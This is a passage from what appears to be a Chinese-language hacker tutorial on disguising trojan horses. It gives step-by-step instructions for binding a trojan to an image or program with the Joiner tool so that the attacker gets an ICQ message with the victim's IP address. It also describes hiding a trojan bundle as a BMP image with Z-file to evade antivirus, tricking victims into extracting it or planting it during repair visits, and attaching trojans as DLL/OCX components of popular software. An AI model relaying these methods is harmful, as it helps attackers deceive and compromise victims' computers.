正因为如此，黑客们纷纷弃之转而使用一个更简单而功能更强的软件，那就是Joiner 了。此软件不但把软件合拼后的体积减少，而且可以待使用者执行后立马就能收到一个icq 的信息，告诉你对方已中招及对方的IP ，更重要的是这个软件可以把图像文件、音频文件与可执行文件合拼，用起来相当方便。

首先把Joiner 解压，然后执行Joiner ，在程序的画面里，有“First executable : ”及“ Second File : ”两项，这两行的右方都有一个文件夹图标，分别各自选择想合拼的文件。

下面还有一个Enable ICQ notification 的空格，如果选取后，当对方执行了文件时，便会收到对方的一个ICQ Web Messgaer ，里面会有对方的ip ，当然要在下面的ICQ number 填上欲收取信息的icq 号码。但开启这个功能后，合拼后的文件会比较大。

最后便按下“Join” ，在Joiner 的文件夹里，便会出现一个Result.exe 的文件，文件可更改名称，因而这种“混合体”的隐蔽性是不言而喻的。

3、以Z-file 伪装加密程序

Z-file 伪装加密软件是台湾华顺科技的产品，其经过将文件压缩加密之后，再以 bmp图像文件格式显示出来(扩展名是 bmp，执行后是一幅普通的图像)。当初设计这个软件的本意只是用来加密数据，用以就算计算机被入侵或被非法使使用时，也不容易泄漏你的机密数据所在。不过如果到了黑客手中，却可以变成一个入侵他人的帮凶。 使用者会将木马程序和小游戏合拼，再用 Z-file 加密及将 此“混合体”发给受害者，由于看上去是图像文件，受害者往往都不以为然，打开后又只是一般的图片，最可怕的地方还在于就连杀毒软件也检测不出它内藏特洛伊木马，甚至病毒！当打消了受害者警惕性后，再让他用WinZip 解压缩及执行 “伪装体 (比方说还有一份小礼物要送给他)，这样就可以成功地安装了木马程序。 如果入侵者有机会能使用受害者的电脑(比如上门维修电脑)，只要事先已经发出了“混合体，则可以直接用 Winzip 对其进行解压及安装。由于上门维修是赤着手使用其电脑，受害者根本不会怀疑有什么植入他的计算机中，而且时间并不长，30秒时间已经足够。就算是“明晃晃”地在受害者面前操作，他也不见得会看出这一双黑手正在干什么。特别值得一提的是，由于 “混合体” 可以躲过反病毒程序的检测，如果其中内含的是一触即发的病毒，那么一经结开压缩，后果将是不堪设想。

4、伪装成应用程序扩展组件

此类属于最难识别的特洛伊木马。黑客们通常将木马程序写成为任何类型的文件 (例如 dll、ocx等) 然后挂在一个十分出名的软件中，例如 OICQ 。由于OICQ本身已有一定的知名度，没有人会怀疑它的安全性，更不会有人检查它的文件是否多了。而当受害者打开OICQ时，这个有问题的文件即会同时执行。 此种方式相比起用合拼程序有一个更大的好处，那就是不用更改被入侵者的登录文件，以后每当其打开OICQ时木马程序就会同步运行 ，相较一般特洛伊木马可说是“踏雪无痕”。更要命的是，此类入侵者大多也是特洛伊木马编写者，只要稍加改动，就会派生出一支新木马来，所以即使杀是毒软件也拿它没有丝毫办法。